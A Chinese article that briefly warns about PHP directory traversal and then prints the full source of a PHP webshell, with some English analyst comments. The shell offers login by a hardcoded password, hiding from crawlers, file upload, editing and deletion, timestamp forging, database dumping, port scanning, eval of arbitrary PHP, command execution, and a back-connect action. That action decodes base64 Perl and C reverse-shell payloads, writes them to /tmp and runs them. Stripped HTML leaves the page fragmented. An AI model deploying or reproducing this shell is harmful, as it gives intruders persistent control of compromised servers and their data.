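攻击者在网站上挂马之后,就可以进入PHP所在的目录;如果PHP开启了scandir方法,还可以直接沿着目录一级一级地向上层进入,此操作会造成很大的风险。需要注意的是,仅禁用scandir并不够:下面的代码在scandir不存在时会改用opendir/readdir自行实现,因此还应通过open_basedir限制PHP可访问的目录范围,并对Web目录做文件完整性监控。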
下面给出PHP的木马文件
// Bootstrap of the script: runtime settings, a User-Agent filter, path/OS
// constants, and capture of the POST parameters. Analyst annotations only;
// the code itself is unchanged.
//ini_set('display_errors',1);
// The calls below are prefixed with @, which suppresses any PHP warnings
// they would raise, so failures leave little trace in the PHP error log.
@error_reporting(7);
@session_start();
// A limit of 0 removes PHP's execution-time cap for this request.
@set_time_limit(0);
@set_magic_quotes_runtime(0);
// Any request whose User-Agent contains "bot" (case-insensitive) is sent a
// Not Found header and the script exits. Crawler-style scanners therefore do
// not see the page; detection has to rely on file-system and log review.
if( strpos( strtolower($_SERVER['HTTP_USER_AGENT'] ), 'bot' ) !== false ) {
header('HTTP/1.0404 Not Found');
exit;
}
ob_start();
// Start timestamp (seconds + microseconds) kept in $starttime.
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
// SA_ROOT: directory of this file, with backslashes normalised to "/" and a
// trailing "/". SELF: the script's own URL path, used for redirects.
define('SA_ROOT', str_replace('\\', '/',dirname(__FILE__)).'/');
define('SELF', $_SERVER['PHP_SELF'] ?$_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']);
define('IS_WIN', DIRECTORY_SEPARATOR =='\\');
define('IS_GPC', get_magic_quotes_gpc());
// Reads the configured disable_functions list; IS_PHPINFO is 1 only when
// "phpinfo" does not appear in it.
// NOTE(review): eregi() and set_magic_quotes_runtime() were removed in PHP 7.0
// and get_magic_quotes_gpc() in PHP 8.0, so this sample targets legacy PHP.
$dis_func =get_cfg_var('disable_functions');
define('IS_PHPINFO',(!eregi("phpinfo",$dis_func)) ? 1 : 0 );
// s_array() is not defined in this part of the file; presumably it undoes
// magic-quotes escaping on the POST data -- confirm against its definition.
if( IS_GPC ) {
$_POST= s_array($_POST);
}
// All request parameters are copied into $P and $_POST is then unset, so the
// script is driven by POST bodies only. Access logs that record just the URL
// will not show the parameters; body logging or WAF inspection is needed.
$P = $_POST;
unset($_POST);
/*===================== Program configuration =====================*/
// 32-hex-character digest that the login check compares against. The value is
// the widely published MD5 of "123456"; encode_pass() is defined elsewhere, so
// the exact hashing scheme should be confirmed there. As a fixed literal it is
// a practical string to search for when hunting for copies of this file.
$pass = 'e10adc3949ba59abbe56e057f20f883e'; // the corresponding password is 123456
// If you have special requirements for the cookie scope, or login misbehaves, change the variables below; otherwise keep the defaults
// cookie prefix
$cookiepre = '';
// cookie domain
$cookiedomain = '';
// cookie path
$cookiepath = '/';
// cookie lifetime (86400 is one day if read as seconds; scookie() is not shown here -- confirm)
$cookielife = 86400;
/*===================== End of configuration =====================*/
$charsetdb = array(
'big5' => 'big5',
'cp-866' => 'cp866',
'euc-jp' => 'ujis',
'euc-kr' => 'euckr',
'gbk' => 'gbk',
'iso-8859-1' => 'latin1',
'koi8-r' => 'koi8r',
'koi8-u' => 'koi8u',
'utf-8' => 'utf8',
'windows-1252' => 'latin1',
);
$act = isset($P['act']) ? $P['act'] : '';
$charset = isset($P['charset']) ? $P['charset']: 'gbk';
$doing = isset($P['doing']) ? $P['doing'] :'';
for ($i=1;$i<=4;$i++) {
${'p'.$i}= isset($P['p'.$i]) ? $P['p'.$i] : '';
}
if (isset($charsetdb[$charset])) {
header("content-Type:text/html; charset=".$charset);
}
$timestamp = time();
/* Authentication */
// Logout: the loginpass cookie is overwritten with an empty value and a
// negative lifetime, then the client is redirected back to the script.
if ($act == "Logout") {
scookie('loginpass','', -86400 * 365);
@header('Location:'.SELF);
exit;
}
// The gate only runs when $pass is non-empty; with an empty $pass no check is made.
if($pass) {
if($act == 'login') {
// The submitted password goes through encode_pass() (defined elsewhere) and
// is compared with $pass using the loose == operator.
if($pass == encode_pass($P['password'])) {
// On success the same encode_pass() output is stored in the loginpass
// cookie and the client is redirected to the script.
scookie('loginpass',encode_pass($P['password']));
@header('Location:'.SELF);
exit;
}
}
// Every other request is admitted only if the loginpass cookie equals $pass
// (loose != comparison); otherwise loginpage() is called.
// NOTE(review): loginpage() and scookie() are not visible here; presumably
// loginpage() renders the form and stops execution -- confirm.
// For log review: a loginpass cookie sent to a PHP file the application does
// not own is an indicator worth searching proxy/WAF logs for (the cookie
// name may carry the configured prefix).
if(isset($_COOKIE['loginpass'])) {
if($_COOKIE['loginpass'] != $pass) {
loginpage();
}
}else {
loginpage();
}
}
/* End of authentication */
$errmsg = '';
$uchar = '▲';
$dchar = '▼';
!$act && $act = 'file';
//当前目录/设置工作目录/网站根目录
$home_cwd = getcwd();
if (isset($P['cwd']) && $P['cwd']){
chdir($P['cwd']);
} else {
chdir(SA_ROOT);
}
$cwd = getcwd();
$web_cwd = $_SERVER['DOCUMENT_ROOT'];
foreach (array('web_cwd','cwd','home_cwd')as $k) {
if(IS_WIN) {
$$k= str_replace('\\', '/', $$k);
}
if(substr($$k, -1) != '/') {
$$k= $$k.'/';
}
}
// 查看PHPINFO
if ($act == 'phpinfo') {
if(IS_PHPINFO) {
phpinfo();
exit;
}else {
$errmsg= 'phpinfo() function has disabled';
}
}
if(!function_exists('scandir')) {
functionscandir($cwd) {
$files= array();
$dh= opendir($cwd);
while($file = readdir($dh)) {
$files[]= $file;
}
return$files ? $files : 0;
}
}
// File download action: streams the file named by the request parameter $p1
// to the client as an attachment. No path restriction is applied in this
// block, so the reach is bounded only by what the PHP process can read
// (OS permissions of the web-server account, and open_basedir if configured).
if ($act == 'down') {
if(is_file($p1) && is_readable($p1)) {
// Discard anything already buffered so only the file bytes are sent.
@ob_end_clean();
$fileinfo= pathinfo($p1);
// Content type comes from mime_content_type() when available, otherwise
// it is built from the file extension.
if(function_exists('mime_content_type')) {
$type= @mime_content_type($p1);
header("Content-Type:".$type);
}else {
header('Content-type:application/x-'.$fileinfo['extension']);
}
header('Content-Disposition:attachment; filename='.$fileinfo['basename']);
// %u formats the size as an unsigned integer.
header('Content-Length:'.sprintf("%u", @filesize($p1)));
@readfile($p1);
exit;
}else {
// Unreadable or missing file: record an error and fall back to the
// file-manager view.
$errmsg= 'Can\'t read file';
$act= 'file';
}
}
?>
body,td{font: 12pxArial,Tahoma;line-height: 16px;}
.input, select{font:12pxArial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
.area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}
.red{color:#f00;}
.black{color:#000;}
.green{color:#090;}
.b{font-weight:bold;}
.bt{border-color:#b0b0b0;background:#3d3d3d;color:#fff;font:12px Arial,Tahoma;height:22px;}
a {color: #00f;text-decoration:none;}
a:hover{color:#f00;text-decoration:underline;}
.alt1 td{border-top:1px solid#fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1pxsolid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
.focus td{border-top:1px solid#fff;border-bottom:1px solid #ddd;background:#ffa;padding:5px 15px 5px 5px;}
.head td{border-top:1px solid#fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px5px;font-weight:bold;}
.head td span{font-weight:normal;}
.infolist {padding:10px;margin:10px 0 20px0;background:#F1F1F1;border:1px solid #ddd;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
ul.infoli{margin:0;color:#444;line-height:24px;height:24px;}
u{text-decoration:none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
.drives{padding:5px;}
.drives span {margin:auto 7px;}
function checkall(form) {
for(vari=0;i
vare = form.elements[i];
if (e.type == 'checkbox') {
if(e.name != 'chkall' && e.name != 'saveasfile')
e.checked= form.chkall.checked;
}
}
}
function $(id) {
returndocument.getElementById(id);
}
function createdir(){
varnewdirname;
newdirname= prompt('请输入目录名:', '');
if(!newdirname) return;
g(null,null,'createdir',newdirname);
}
function fileperm(pfile, val){
varnewperm;
newperm= prompt('当前 目录/文件:'+pfile+'\n请输入新的权限:', val);
if(!newperm) return;
g(null,null,'fileperm',pfile,newperm);
}
function rename(oldname){
varnewfilename;
newfilename= prompt('文件名:'+oldname+'\n请输入新的文件名:', '');
if(!newfilename) return;
g(null,null,'rename',newfilename,oldname);
}
function createfile(){
varfilename;
filename= prompt('请输入文件的名字:', '');
if(!filename) return;
g('editfile',null, null, filename);
}
function setdb(dbname) {
if(!dbname)return;
$('dbform').tablename.value='';
$('dbform').doing.value='';
if($('dbform').sql_query)
{
$('dbform').sql_query.value='';
}
$('dbform').submit();
}
function setsort(k) {
$('dbform').order.value=k;
$('dbform').submit();
}
function settable(tablename,doing) {
if(!tablename)return;
if(doing) {
$('dbform').doing.value=doing;
}else {
$('dbform').doing.value='';
}
$('dbform').sql_query.value='';
$('dbform').tablename.value=tablename;
$('dbform').submit();
}
function s(act,cwd,p1,p2,p3,p4,charset) {
if(act!= null) $('opform').act.value=act;
if(cwd!= null) $('opform').cwd.value=cwd;
if(p1!= null) $('opform').p1.value=p1;
if(p2!= null) $('opform').p2.value=p2;
if(p3!= null) $('opform').p3.value=p3;
if(p4!= null) {$('opform').p4.value=p4;}else{$('opform').p4.value='';}
if(charset!= null) $('opform').charset.value=charset;
}
function g(act,cwd,p1,p2,p3,p4,charset) {
s(act,cwd,p1,p2,p3,p4,charset);
$('opform').submit();
}
formhead(array('name'=>'opform'));
makehide('act', $act);
makehide('cwd', $cwd);
makehide('p1', $p1);
makehide('p2', $p2);
makehide('p3', $p3);
makehide('p4', $p4);
makehide('charset', $charset);
formfoot();
if(!function_exists('posix_getegid')) {
$user= @get_current_user();
$uid= @getmyuid();
$gid= @getmygid();
$group= "?";
} else {
$uid= @posix_getpwuid(@posix_geteuid());
$gid= @posix_getgrgid(@posix_getegid());
$uid= $uid['uid'];
$user= $uid['name'];
$gid= $gid['gid'];
$group= $gid['name'];
}
?>
makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'onchange'=>'g(null,null,null,null,null,null,this.value);'));
?>
|
$errmsg && m($errmsg);
if ($act == 'file') {
//判断当前目录可写情况
$dir_writeable= @is_writable($cwd) ? 'Writable' : 'Non-writable';
if(isset($p1)) {
switch($p1){
case'createdir':
//创建目录
if($p2) {
m('Directorycreated '.(@mkdir($cwd.$p2,0777) ? 'success' : 'failed'));
}
break;
case'uploadFile':
//上传文件
m('Fileupload '.(@move_uploaded_file($_FILES['uploadfile']['tmp_name'],$cwd.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
break;
case'fileperm':
//编辑文件属性
if($p2 && $p3) {
$p3= base_convert($p3, 8, 10);
m('Setfile permissions '.(@chmod($p2, $p3) ? 'success' : 'failed'));
}
break;
case'rename':
//改名
if($p2 && $p3) {
m($p3.'renamed '.$p2.(@rename($p3, $p2) ? ' success' : ' failed'));
}
break;
case'clonetime':
//克隆时间
if($p2 && $p3) {
$time= @filemtime($p3);
m('Setfile last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));
}
break;
case'settime':
//自定义时间
if($p2 && $p3) {
$time= strtotime($p3);
m('Setfile last modified '.(@touch($p2,$time,$time) ? 'success' : 'failed'));
}
break;
case'delete':
//批量删除文件
if($P['dl']) {
$succ= $fail = 0;
foreach($P['dl'] as $f) {
if(is_dir($cwd.$f)) {
if(@deltree($cwd.$f)) {
$succ++;
}else {
$fail++;
}
}else {
if(@unlink($cwd.$f)) {
$succ++;
}else {
$fail++;
}
}
}
m('Deletedfolder/file(s) have finished, choose '.count($P['dl']).', success '.$succ.',fail '.$fail);
}else {
m('Pleaseselect folder/file(s)');
}
break;
case'paste':
if($_SESSION['do']== 'copy') {
foreach($_SESSION['dl']as $f) {
copy_paste($_SESSION['c'],$f,$cwd);
}
}elseif($_SESSION['do'] == 'move') {
foreach($_SESSION['dl']as $f) {
@rename($_SESSION['c'].$f,$cwd.$f);
}
}
unset($_SESSION['do'],$_SESSION['dl'], $_SESSION['c']);
break;
default:
if($p1== 'copy' || $p1 == 'move') {
if(isset($P['dl']) && count($P['dl'])) {
$_SESSION['do']= $p1;
$_SESSION['dl']= $P['dl'];
$_SESSION['c']= $P['cwd'];
m('Havebeen copied to the session');
}else {
m('Pleaseselect folder/file(s)');
}
}
break;
}
echo"
}
//操作完毕
$free= @disk_free_space($cwd);
!$free&& $free = 0;
$all= @disk_total_space($cwd);
!$all&& $all = 0;
$used= $all-$free;
p(' 文件管理器——当前的磁盘空间 '.sizecount($free).' of'.sizecount($all).' ('.@round(100/($all/$free),2).'%)');
$cwd_links= '';
$path= explode('/', $cwd);
$n=count($path);
for($i=0;$i<$n-1;$i++){
$cwd_links.= ''.$path[$i].'/';
}
?>
document.onclick = shownav;
function shownav(e){
varsrc = e?e.target:event.srcElement;
do{
if(src.id=="jumpto") {
$('inputnav').style.display= "";
$('pathnav').style.display= "none";
return;
}
if(src.id=="inputnav") {
return;
}
src= src.parentNode;
}while(src.parentNode)
$('inputnav').style.display= "none";
$('pathnav').style.display= "";
}
|
if(IS_WIN) {
$comma= '';
p('
foreach(range('A','Z') as $drive ) {
if(is_dir($drive.':/')) {
p($comma.'
$comma= '|';
}
}
p('
}
?>
p('
p(' p(' p(' p('| 程序目录'); p('| p('');
');
$sort= array('filename', 1);
if($p1){
if(preg_match('!s_([A-z_]+)_(\d{1})!',$p1, $match)) {
$sort= array($match[1], (int)$match[2]);
}
}
formhead(array('name'=>'flist'));
makehide('act','file');
makehide('p1','');
makehide('cwd',$cwd);
makehide('charset',$charset);
p('
p('
p('
p('
p('
p('
p('
p('');
//查看所有可写文件和目录
$dirdata=$filedata=array();
if($p4 == 'dir') {
$dirdata= GetWDirList($cwd);
$filedata= array();
}else {
//默认目录列表
$dirs= @scandir($cwd);
if($dirs) {
$dirs= array_diff($dirs, array('.'));
foreach($dirs as $file) {
$filepath=$cwd.$file;
if(@is_dir($filepath)){
$dirdb['filename']=$file;
$dirdb['mtime']=@date('Y-m-dH:i:s',filemtime($filepath));
$dirdb['chmod']=getChmod($filepath);
$dirdb['perm']=PermsColor($filepath);
$dirdb['owner']=getUser($filepath);
$dirdb['link']=$filepath;
if($file=='..') {
$dirdata['up']=1;
}else {
$dirdata[]=$dirdb;
}
}else {
$filedb['filename']=$file;
//$filedb['size']=@filesize($filepath);
$filedb['size']=sprintf("%u",@filesize($filepath));
$filedb['mtime']=@date('Y-m-dH:i:s',filemtime($filepath));
$filedb['chmod']=getChmod($filepath);
$filedb['perm']=PermsColor($filepath);
$filedb['owner']=getUser($filepath);
$filedb['link']=$filepath;
$filedata[]=$filedb;
}
}
unset($dirdb);
unset($filedb);
}
}
$dir_i= '0';
if(isset($dirdata['up'])) {
$thisbg= bg();
p('
p(' ');
p('');
}
unset($dirdata['up']);
usort($dirdata,'cmp');
usort($filedata,'cmp');
foreach($dirdataas $key => $dirdb){
if($p1== 'getsize' && $p2 == $dirdb['filename']) {
$attachsize= dirsize($p2);
$attachsize= is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
}else {
$attachsize= '查看大小';
}
$thisbg= bg();
p('
p('
p('
p('
p('
p('
p('
p('
p('
p('');
$dir_i++;
}
p('');
$file_i= '0';
foreach($filedataas $key => $filedb){
$fileurl= '/'.str_replace($web_cwd,'',$filedb['link']);
$thisbg= bg();
p('
p('
p('
p('
p('
p('
p('
p('
p('
p('
p('
p('
p('');
$file_i++;
}
p(''.$dir_i.' 目录 / '.$file_i.' 文件 ');
p('');
}// end dir
elseif ($act == 'mysqladmin') {
$order= isset($P['order']) ? $P['order'] : '';
$dbhost= isset($P['dbhost']) ? $P['dbhost'] : '';
$dbuser= isset($P['dbuser']) ? $P['dbuser'] : '';
$dbpass= isset($P['dbpass']) ? $P['dbpass'] : '';
$dbname= isset($P['dbname']) ? $P['dbname'] : '';
$tablename= isset($P['tablename']) ? $P['tablename'] : '';
if($doing == 'dump') {
if(isset($P['bak_table']) && $P['bak_table']) {
$DB= new DB_MySQL;
$DB->charsetdb= $charsetdb;
$DB->charset= $charset;
$DB->connect($dbhost,$dbuser, $dbpass, $dbname);
if($P['saveasfile'] && $P['bak_path']) {
$fp= @fopen($P['bak_path'],'w');
if($fp) {
foreach($P['bak_table']as $k => $v) {
if($v) {
$DB->sqldump($v,$fp);
}
}
fclose($fp);
$fileurl= str_replace(SA_ROOT,'',$P['bak_path']);
m('Databasehas backup to '.$P['bak_path'].'');
}else {
m('Backupfailed');
}
}else {
@ob_end_clean();
$filename= basename($dbname.'.sql');
header('Content-type:application/unknown');
header('Content-Disposition:attachment; filename='.$filename);
foreach($P['bak_table']as $k => $v) {
if($v) {
$DB->sqldump($v);
}
}
exit;
}
$DB->close();
}else {
m('Pleasechoose the table');
}
$doing= '';
}
formhead(array('title'=>'MYSQL管理', 'name'=>'dbform'));
makehide('act','mysqladmin');
makehide('doing',$doing);
makehide('charset',$charset);
makehide('tablename',$tablename);
makehide('order',$order);
p('
');
p('地址:');
makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
p('用户:');
makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
p('密码:');
makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
makeinput(array('value'=>'连接','type'=>'submit','class'=>'bt'));
p('
');
if($dbhost && $dbuser && isset($dbpass)) {
//初始化数据库类
$DB= new DB_MySQL;
$DB->charsetdb= $charsetdb;
$DB->charset= $charset;
$DB->connect($dbhost,$dbuser, $dbpass, $dbname);
//获取数据库信息
p('
$highver= $DB->version() > '4.1' ? 1 : 0;
//获取数据库
$query= $DB->query("SHOW DATABASES");
$dbs= array();
$dbs[]= '-- Select a database --';
while($db= $DB->fetch($query)) {
$dbs[$db['Database']]= $db['Database'];
}
makeselect(array('name'=>'dbname','option'=>$dbs,'selected'=>$dbname,'onchange'=>'setdb(this.options[this.selectedIndex].value)'));
if($dbname) {
p('
Currentdababase:
if($tablename) {
p('| Current Table: '.$tablename.'[ Structure ]');
}
p('
');
$sql_query= isset($P['sql_query']) ? $P['sql_query'] : '';
if($tablename && !$sql_query) {
$sql_query= "SELECT * FROM $tablename LIMIT 0, 30";
}
if($tablename && $doing == 'structure') {
$sql_query= "SHOW FULL COLUMNS FROM $tablename;\n";
$sql_query.= "SHOW INDEX FROM $tablename;";
}
p('
Run SQLquery/queries on database'.$dbname.':
if($sql_query) {
$querys= @explode(';',$sql_query);
foreach($querysas $num=>$query) {
if($query) {
p("
switch($DB->query_res($query))
{
case0:
p('
break;
case1:
$result= $DB->query($query);
$tatol= $DB->num_rows($result);
p('
p('
$fieldnum= @mysql_num_fields($result);
for($i=0;$i<$fieldnum;$i++){
p('
}
p('');
if(!$tatol) {
p('Norecords ');
}else {
while($mn= $DB->fetch($result)){
$thisbg= bg();
p('
//读取记录用
foreach($mnas $key=>$inside){
p('
}
p('');
unset($b1);
}
}
p('');
break;
case2:
p('
break;
}
}
}
}else {
$query= $DB->query("SHOW TABLE STATUS");
$table_num= $table_rows = $data_size = 0;
$tabledb= array();
while($table= $DB->fetch($query)) {
$data_size= $data_size + $table['Data_length'];
$table_rows= $table_rows + $table['Rows'];
$table_num++;
$tabledb[]= $table;
}
$data_size= sizecount($data_size);
unset($table);
if(count($tabledb)) {
if($highver) {
$db_engine= $DB->fetch($DB->query("SHOW VARIABLES LIKE'storage_engine';"));
$db_collation= $DB->fetch($DB->query("SHOW VARIABLES LIKE'collation_database';"));
}
$sort= array('Name', 1);
if($order){
if(preg_match('!s_([A-z_]+)_(\d{1})!',$order, $match)) {
$sort= array($match[1], (int)$match[2]);
}
}
usort($tabledb,'cmp');
p('
p('
p('
p('
p('
p('
p('
p('
if($highver) {
p('
p('
}
p('
p('');
foreach($tabledb as $key => $table) {
$thisbg= bg();
p('
p('
p('
p('
p('
p('
p('
if($highver) {
p('
p('
}
p('
p('');
}
p('
p('
p('
p('
p('
p('
p('
if($highver) {
p('
p('
}
p('
p('');
p("
p("");
}else {
p('
}
$DB->free_result($query);
}
}
$DB->close();
}
formfoot();
}//end mysql
elseif ($act == 'backconnect') {
!$p2&& $p2 = $_SERVER['REMOTE_ADDR'];
!$p3&& $p3 = '12345';
$usedb= array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
if($p1 == 'start' && $p2 && $p3 && $p4){
if($p4 == 'perl') {
cf('/tmp/angel_bc',$back_connect);
$res= execute(which('perl')." /tmp/angel_bc ".$p2."".$p3." &");
}else {
cf('/tmp/angel_bc.c',$back_connect_c);
$res= execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
@unlink('/tmp/angel_bc.c');
$res= execute("/tmp/angel_bc ".$p2." ".$p3." &");
}
m('Nowscript try connect to '.$p2.':'.$p3.' ...');
}
formhead(array('title'=>'BackConnect', 'onsubmit'=>'g(\'backconnect\',null,\'start\',this.p2.value,this.p3.value,this.p4.value);returnfalse;'));
p('
');
p('YourIP:');
makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));
p('YourPort:');
makeinput(array('name'=>'p3','size'=>15,'value'=>$p3));
p('Use:');
makeselect(array('name'=>'p4','option'=>$usedb,'selected'=>$p4));
makeinput(array('value'=>'Start','type'=>'submit','class'=>'bt'));
p('
');
formfoot();
}//end
elseif ($act == 'portscan') {
!$p2&& $p2 = '127.0.0.1';
!$p3&& $p3 = '21,80,135,139,445,1433,3306,3389,5631,43958';
formhead(array('title'=>'端口扫描','onsubmit'=>'g(\'portscan\',null,\'start\',this.p2.value,this.p3.value);returnfalse;'));
p('
');
p('IP:');
makeinput(array('name'=>'p2','size'=>20,'value'=>$p2));
p('Port:');
makeinput(array('name'=>'p3','size'=>80,'value'=>$p3));
makeinput(array('value'=>'扫描','type'=>'submit','class'=>'bt'));
p('
');
formfoot();
if($p1 == 'start') {
p('
p('
foreach(explode(',',$p3) as $port) {
$fp= @fsockopen($p2, $port, $errno, $errstr, 1);
if(!$fp) {
p('
} else {
p('
@fclose($fp);
}
}
p('');
}
}
elseif ($act == 'eval') {
$phpcode= trim($p1);
if($phpcode){
if(!preg_match('#<\?#si', $phpcode)) {
$phpcode= "";
}
eval("?".">$phpcode");
}
formhead(array('title'=>'EvalPHP代码','onsubmit'=>'g(\'eval\',null,this.p1.value);return false;'));
maketext(array('title'=>'PHP代码','name'=>'p1', 'value'=>$phpcode));
p('
formfooter();
}//end eval
elseif ($act == 'editfile') {
//编辑文件
if($p1 == 'edit' && $p2 && $p3) {
$fp= @fopen($p2,'w');
m('Savefile '.(@fwrite($fp,$p3) ? 'success' : 'failed'));
@fclose($fp);
}
$contents= '';
if(file_exists($p2)){
$fp=@fopen($p2,'r');
$contents=@fread($fp,filesize($p2));
@fclose($fp);
$contents=htmlspecialchars($contents);
}
formhead(array('title'=>'创建/编辑文件','onsubmit'=>'g(\'editfile\',null,\'edit\',this.p2.value,this.p3.value);returnfalse;'));
makeinput(array('title'=>'文件名:','name'=>'p2','value'=>$p2,'newline'=>1));
maketext(array('title'=>'文件内容:','name'=>'p3','value'=>$contents));
formfooter();
goback();
}//end editfile
elseif ($act == 'newtime') {
$filemtime= @filemtime($p1);
formhead(array('title'=>'Clonefolder/file was last modified time','onsubmit'=>'g(\'file\',null,\'clonetime\',this.p2.value,this.p3.value);returnfalse;'));
makeinput(array('title'=>'Alterfolder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));
makeinput(array('title'=>'Referencefolder/file','name'=>'p3','value'=>$cwd,'size'=>120,'newline'=>1));
formfooter();
formhead(array('title'=>'Setlast modified','onsubmit'=>'g(\'file\',null,\'settime\',this.p2.value,this.p3.value);returnfalse;'));
makeinput(array('title'=>'Currentfolder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1));
makeinput(array('title'=>'Modifytime','name'=>'p3','value'=>date("Y-m-d H:i:s",$filemtime),'size'=>120,'newline'=>1));
formfooter();
goback();
}//end newtime
elseif ($act == 'shell') {
formhead(array('title'=>'执行命令', 'onsubmit'=>'g(\'shell\',null,this.p1.value);return false;'));
p('
');
makeinput(array('name'=>'p1','value'=>htmlspecialchars($p1)));
makeinput(array('class'=>'bt','type'=>'submit','value'=>'执行'));
p('
');
formfoot();
if($p1) {
p('
'.execute($p1).'');
}
}//end shell
elseif ($act == 'phpenv') {
$d=array();
if(function_exists('mysql_get_client_info'))
$d[]= "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$d[]= "MSSQL";
if(function_exists('pg_connect'))
$d[]= "PostgreSQL";
if(function_exists('oci_connect'))
$d[]= "Oracle";
$info= array(
1=> array('服务器 时间',date('Y/m/d h:i:s',$timestamp)),
2=> array('服务器 域名',$_SERVER['SERVER_NAME']),
3=> array('服务器IP',gethostbyname($_SERVER['SERVER_NAME'])),
4=> array('服务器 系统',PHP_OS),
5=> array('服务器 系统编码',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
6=> array('服务器 软件',$_SERVER['SERVER_SOFTWARE']),
7=> array('服务器 网站端口',$_SERVER['SERVER_PORT']),
8=> array('PHP 运行方式',strtoupper(php_sapi_name())),
9=> array('文件路径',__FILE__),
10=> array('PHP 版本',PHP_VERSION),
11=> array('PHP信息',(IS_PHPINFO ? '
12=> array('安全模式',getcfg('safe_mode')),
13=> array('管理员',(isset($_SERVER['SERVER_ADMIN']) ?$_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'))),
14=> array('允许url打开',getcfg('allow_url_fopen')),
15=> array('使用dl',getcfg('enable_dl')),
16=> array('显示错误',getcfg('display_errors')),
17=> array('注册全局变量',getcfg('register_globals')),
18=> array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
19=> array('内存限制',getcfg('memory_limit')),
20=> array('post大小',getcfg('post_max_size')),
21=> array('上传文件大小',(getcfg('file_uploads') ?getcfg('upload_max_filesize') : 'Not allowed')),
22=> array('执行时间',getcfg('max_execution_time').'second(s)'),
23=> array('禁用功能',($dis_func ? $dis_func : 'No')),
24=> array('所支持的数据库',implode(', ', $d)),
25=> array('Curl支持',function_exists('curl_version') ?'Yes' : 'No'),
26=> array('Open base dir',getcfg('open_basedir')),
27=> array('Safe mode exec dir',getcfg('safe_mode_exec_dir')),
28=> array('Safe mode include dir',getcfg('safe_mode_include_dir')),
);
$hp= array(0=> 'Server', 1=> 'PHP');
for($a=0;$a<2;$a++){
p('
p('
if($a==0) {
for($i=1;$i<=9;$i++){
p('
}
}elseif ($a == 1) {
for($i=10;$i<=25;$i++){
p('
}
}
p('');
}
}//end phpenv
